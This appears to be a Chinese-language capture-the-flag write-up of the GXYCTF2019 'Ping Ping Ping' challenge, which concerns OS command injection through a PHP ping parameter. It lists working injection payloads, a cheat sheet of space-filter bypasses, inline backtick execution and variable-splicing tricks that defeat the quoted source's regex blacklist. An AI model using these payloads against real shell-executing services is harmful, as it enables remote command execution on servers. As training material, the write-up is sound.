[GXYCTF2019]Ping Ping Ping

解题步骤

1、先使用 内敛执行 查看当前的php文件

  • 执行 命令执行 发现空格被过滤 ?ip=127.0.0.1IFS\|IFSwhomi

  • 还有一个点就是这个 执行的命令是不能进行拼接的 可能就是被过滤了 | 所以我们使用 ; 进行绕过一下

复制代码
  空格过滤代替
  $IFS
  ${IFS}
  ${IFS}$9 //这里$1到$9都可以
  $IFS$1 //这里$1到$9都可以
  <
  <>
  {cat,flag.php} //用逗号实现了空格功能,需要用{}括起来
  %20 (space) //在shell中无法直接使用%20代替空格,但是在URL编码中可以尝试,tab同理
  %09 (tab)
  ?ip=127.0.0.1;cat$IFS`ls`
  内敛执行 : cat`ls` 就是查看 ls 执行结果的内容 这个其实就能执行拿下flag了
  • ctrl+u 查看源码

升级 :

  • 代码审计
复制代码
  /?ip=
  |\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ // | 拼接执行全部鸡鸡
  echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
  //过滤特殊的符号 preg_match() 函数表示使用正则进行匹配
  die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
  die("fxck your space!"); //过滤空格
  } else if(preg_match("/bash/", $ip)){ // 不能使用反弹命令 bash
  die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){ //发现 f l a g 都是被过滤的 那我们不能在后面写flag了
  die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "
  ";
  print_r($a);
  }
  ?>
  • 这个我们需要使用变量拼接

  • 如这个 cat flag; 我们可以变为 X=fl;cat $Xag

  • ?ip=127.0.0.1;X=ag;IFS1catIFS1fl$X.php

  • 这个变量拼接也是有说法的 多试一下

  • 如果 X=fl 不行就试一下 ag ,f, a等多试一下

  • 当然如果都不行就是试一下 ;a=f;b=l;c=a;d=g;catIFS1abcd.php

相关推荐
mottte5 天前
BUUCTF[极客大挑战 2019]Havefun 1题解
php·web·ctf
mottte5 天前
BUUCTF[ACTF2020 新生赛]Include 1题解
web·ctf·文件包含漏洞
Star abuse9 天前
2025一带一路暨金砖国家技能发展与技术创新大赛第三届企业信息系统安全赛项
安全·web安全·ctf·全国职业院校技能大赛
落寞的魚丶9 天前
第三届宁波技能大赛网络安全赛项样题
网络安全·渗透测试·ctf·服务器配置·第三届宁波技能大赛
kali-Myon11 天前
栈迁移与onegadget利用[GHCTF 2025]ret2libc2
c语言·安全·pwn·ctf·栈溢出·栈迁移·onegadget
亿.612 天前
“轩辕杯“云盾砺剑CTF挑战赛 Web wp
web·ctf·writeup
未完结的牵挂16 天前
第二届帕鲁杯 solar_Linux后门排查 WP
网络安全·ctf·应急响应
ALe要立志成为web糕手17 天前
php://filter的trick
安全·web安全·网络安全·php·ctf
uwvwko20 天前
ctfshow——web入门254~258
android·前端·web·ctf·反序列化
uwvwko21 天前
BUUCTF——web刷题第一页题解
android·前端·数据库·php·web·ctf